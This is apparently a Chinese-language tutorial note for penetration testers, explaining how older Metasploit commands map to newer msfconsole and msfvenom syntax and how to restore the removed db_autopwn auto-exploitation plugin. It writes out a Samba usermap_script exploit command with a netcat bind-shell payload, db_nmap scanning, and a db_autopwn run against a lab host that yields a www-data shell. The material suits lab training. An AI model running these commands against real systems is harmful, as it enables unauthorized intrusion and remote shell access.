1.閱讀老資料的困惑
老資料里一般是根據BT5整理的,kali里的metasploit比較新,不太一樣,這里整理一下。
a)msfcli被整合進msfconsole的參數里:
老指令:
#msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat RHOST=192.168.200.129 E
新指令:
#msfconsole?-x?"use?exploit/multi/samba/usermap_script;?set?RHOST 192.168.200.129;?set?PAYLOADcmd/unix/bind_netcat; [set?LHOST IP;] run"
b)msfpayload、msfencode被整合到msfvenom里:
老指令:
msfpayload -l ? ? ? ?#查看所有攻擊載荷
msfencode -l ? ? ? ? #查看所有編碼器
新指令只需一條指令即可:
msfvenom -l payloads,encoders
下圖是msfvenom的參數說明:
c)db_autopwn自動滲透腳本被刪除
據說是由于該腳本雖然使滲透傻瓜化,但是智能不高,并且造成的負載不小,容易被發現,所以刪掉了。
目前替代的方法是可以使用metasploit的一些自動化插件和腳本,但是更好的方法還是自己選擇合適的腳本和載荷,使負載變小,效率更高。
https://github.com/rapid7/metasploit-framework/tree/master/plugins
2.db_autopwn傻瓜化測試
雖然db_autopwn被刪掉了,但是可以手工恢復。
https://github.com/PsychoSpy/metasploit-framework/blob/autopwn-modules/plugins/db_autopwn.rb
源代碼復制下來,保存為db_autopwn.rb文件,復制到/usr/share/metasploit-framwork/plugins/中,然后執行加載
#msf>load db_autopwn
滲透測試:
a)掃描測試機
#msf>db_nmap -v -A 192.168.200.129
--測試機的掃描結果會自動存放如Postgresql數據庫中
b)查看掃描結果
c)自動測試
#msf>db_autopwn -t -p -r -e?? ? ? ?? ----負載不小,1000多個腳本都會跑一遍,需要不少時間,好在成功了一個session。
d)連接會話并測試
會話連接已經成功,但user是www-data(敲錯的指令,請自動忽略),不是root,沒關系,至少證明db_autopwn還是管用的。